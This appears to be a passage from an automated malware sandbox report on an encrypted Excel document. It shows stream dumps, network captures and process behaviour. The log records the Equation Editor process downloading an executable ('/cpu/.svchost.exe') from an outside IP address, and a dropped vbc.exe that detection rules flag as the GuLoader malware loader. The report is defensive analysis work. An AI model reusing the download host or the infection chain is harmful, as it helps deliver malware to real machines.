                      Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                      General
                      Stream Path:\x6DataSpaces/Version
                      File Type:data
                      Stream Size:76
                      Entropy:2.79079600998
                      Base64 Encoded:False
                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1254968
                      General
                      Stream Path:EncryptedPackage
                      File Type:data
                      Stream Size:1254968
                      Entropy:7.99875082678
                      Base64 Encoded:True
                      Data ASCII:' & . . . . . . . . . . . g . . Z . . . . . . D . . . D n . ? w . . . K . F . . / . # . . & . . . ? . . . . / . . . . . . . j . q . q & . Z . b . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b .
                      Data Raw:27 26 13 00 00 00 00 00 b4 f8 fd f3 03 67 b7 e8 5a a8 8f 06 bd 1e c7 44 f8 02 97 44 6e e5 3f 77 bc ec f7 4b e9 46 c9 1e 2f 1b 23 c2 0b 26 b3 1e b2 3f de fd d4 0d 2f f5 b1 c7 ff df ca aa 6a 19 71 f6 71 26 bf 5a bf 62 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2
                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                      General
                      Stream Path:EncryptionInfo
                      File Type:data
                      Stream Size:224
                      Entropy:4.61267256672
                      Base64 Encoded:False
                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . Y . u . . . . j r r . . n . ^ \\ . . . . . . . . . V . . . . w . . . . h S o . . . . . . . . . . . . G o . . . . . % . b P . . . . . .
                      Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 20 1a c9 02 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                      Network Behavior

                      Network Port Distribution

                      TCP Packets


                      HTTP Request Dependency Graph

                      • 180.214.239.39

                      HTTP Packets

                      Session ID:0
                      Source IP:192.168.2.22
                      Source Port:49165
                      Destination IP:180.214.239.39
                      Destination Port:80
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Timestamp:Jul 15, 2021 11:06:44.850883961 CEST
                      kBytes transferred:1
                      Direction:OUT
                      Data:GET /cpu/.svchost.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 180.214.239.39
                      Connection: Keep-Alive
                      Timestamp:Jul 15, 2021 11:06:45.107646942 CEST
                      kBytes transferred:2
                      Direction:IN
                      Data:HTTP/1.1 200 OK
                      Date: Thu, 15 Jul 2021 09:06:43 GMT
                      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                      Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT
                      ETag: "41470-5c7043f493d18"
                      Accept-Ranges: bytes
                      Content-Length: 267376
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/x-msdownload


                      Code Manipulations

                      Statistics

                      Behavior

                      System Behavior

                      General

                      Start time:11:05:42
                      Start date:15/07/2021
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Imagebase:0x13ffb0000
                      File size:27641504 bytes
                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:11:06:04
                      Start date:15/07/2021
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Imagebase:0x400000
                      File size:543304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:11:06:07
                      Start date:15/07/2021
                      Path:C:\Users\Public\vbc.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\Public\vbc.exe'
                      Imagebase:0x400000
                      File size:267376 bytes
                      MD5 hash:FCFB0EC70F1419EDE8A534CC95CB61E9
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Yara matches:
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                      Antivirus matches:
                      • Detection: 42%, Virustotal, Browse
                      • Detection: 14%, Metadefender, Browse
                      • Detection: 31%, ReversingLabs
                      Reputation:low

                      Disassembly

                      Code Analysis
